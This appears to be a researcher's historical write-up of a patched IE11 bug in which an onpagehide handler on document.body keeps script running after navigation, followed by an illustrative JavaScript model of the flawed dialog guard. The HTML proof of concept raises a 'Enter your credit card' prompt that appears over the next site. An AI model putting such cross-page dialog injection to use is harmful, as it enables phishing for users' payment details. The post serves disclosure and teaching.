Similar in spirit to the onbeforeunload variant, this one used the onpagehide event on document.body to keep script running after the user had navigated away. Setting the handler on the body element rather than the window produced the same resident execution behavior.
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Resident_onpagehide</title>
</head>
<body>
<script language="JavaScript">
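// The handler is attached to document.body rather than window.
document.body.onpagehide = function()
{
    // Runs while the page is being hidden during navigation, so both dialogs
    // are presented while the next page is rendering.
    alert("Wow! This alert is being rendered once Bing is shown!");
    prompt("Enter your credit card:","");
};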
</script>
</body>
</html>
The onpagehide event was part of IE11’s page visibility API, and attaching a handler to document.body rather than window slipped through the same guard that was supposed to prevent cross-page UI injection. The handler fired while the new page was rendering, presenting dialogs in what appeared to be the context of the next site.
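A simplified model of that failure, added here as an example and not taken from IE or from the original post: a dialog guard applied only where `window` handlers are dispatched misses the same handler on `body`, while a check inside the dialog call itself covers both. How IE's guard actually worked is not described above, so the guard logic and every name below (`createPage`, `navigateAway`, `simulate`, the `"source"` and `"sink"` modes) are assumptions for illustration.

```javascript
// Constructed model for illustration; not IE code. All names are hypothetical.
// guard "source": dialogs are suppressed only while a window-level handler runs.
// guard "sink":   the dialog call itself checks whether the page is being torn down.
function createPage(guard) {
  const page = { unloading: 0, suppressed: false, shown: [], blocked: [], handlers: [] };

  page.on = (target, type, fn) => page.handlers.push({ target, type, fn });

  page.alert = (msg) => {
    const deny = guard === "sink" ? page.unloading > 0 : page.suppressed;
    (deny ? page.blocked : page.shown).push(msg);
  };

  page.navigateAway = () => {
    page.unloading++; // non-zero for the whole teardown, whoever owns the handler
    try {
      for (const h of page.handlers.filter((h) => h.type === "pagehide")) {
        page.suppressed = h.target === "window"; // the gap: body handlers are not covered
        try {
          h.fn(page);
        } catch (err) {
          // a throwing handler must not abort teardown or skip the cleanup below
        } finally {
          page.suppressed = false;
        }
      }
    } finally {
      page.unloading--;
    }
  };
  return page;
}

// Register the same dialog-raising handler on both targets and navigate away.
function simulate(guard) {
  const page = createPage(guard);
  page.on("window", "pagehide", (p) => p.alert("dialog from window handler"));
  page.on("body", "pagehide", (p) => p.alert("dialog from body handler"));
  page.navigateAway();
  return { shown: page.shown, blocked: page.blocked };
}

console.log("source-side guard:", simulate("source"));
console.log("sink-side guard:  ", simulate("sink"));
```

With the source-side guard the body handler's dialog is still shown; with the sink-side check both are blocked, because the decision no longer depends on where the handler was registered.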
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.